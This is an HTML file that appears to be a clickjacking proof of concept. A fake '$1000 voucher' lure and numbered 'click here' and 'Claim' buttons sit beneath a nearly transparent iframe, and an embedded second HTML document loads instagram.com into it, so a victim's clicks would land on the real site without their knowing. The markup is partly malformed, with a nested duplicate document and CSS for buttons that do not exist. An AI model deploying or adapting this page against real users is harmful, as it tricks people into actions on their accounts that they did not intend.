<!DOCTYPE html>
<html>
<head>
	<title>Copy Voucher Code to Clipboard</title>
	<style>
		iframe {
			position:relative;
			width: 100%;
			height: 650px;
			opacity: 0.1;
			z-index: 2;
		}
		.firstClick, .secondClick, .thirdClick, .fourthClick, .fifthClick, .sixthClick, h1 {
			position:absolute;
			top:330px;
			z-index: 1;
		}
		.firstClick {
			left: 1280px;
			top: 22px;
		}
		.secondClick {
			left: 1447px;
			top: 579px;
		}
		.thirdClick {
			left: 1380px;
			top: 568px;
		}
		.fourthClick {
			left: 926px;
			top: 292px;
		}
		.fifthClick {
			left: 559px;
			top: 532px;
                }
		.sixthClick {
			left: 559px;
			top: 637px;
		}
		h1 {
			left: 132px;
			top: 143px;
		}
	</style>
</head>
<body>
	<h1>Congrats You Won $1000 Voucher Follow the step & claim voucher</h1>
	<button class="firstClick">click here 1</button>
	<button class="secondClick">Visit here & then press on claim button </button>
	<button class="thirdClick">Claim</button>
	
	<!DOCTYPE html>
<html>
  <head>
    <title>HTML File with WebView-like Behavior</title>
    <style>
      html,
      body {
        margin: 0;
        padding: 0;
        height: 100%;
        width: 100%;
        overflow: hidden;
      }

      #webview-frame {
        width: 100%;
        height: 100%;
        border: none;
      }
    </style>
  </head>
  <body>
    <iframe id="webview-frame" src="about:blank"></iframe>

    <script>
      // Set the desired URL to load
      var url = 'https://instagram.com/';

      // Get the iframe element
      var frame = document.getElementById('webview-frame');

      // Load the URL within the iframe
      frame.src = url;
    </script>
  </body>
</html>






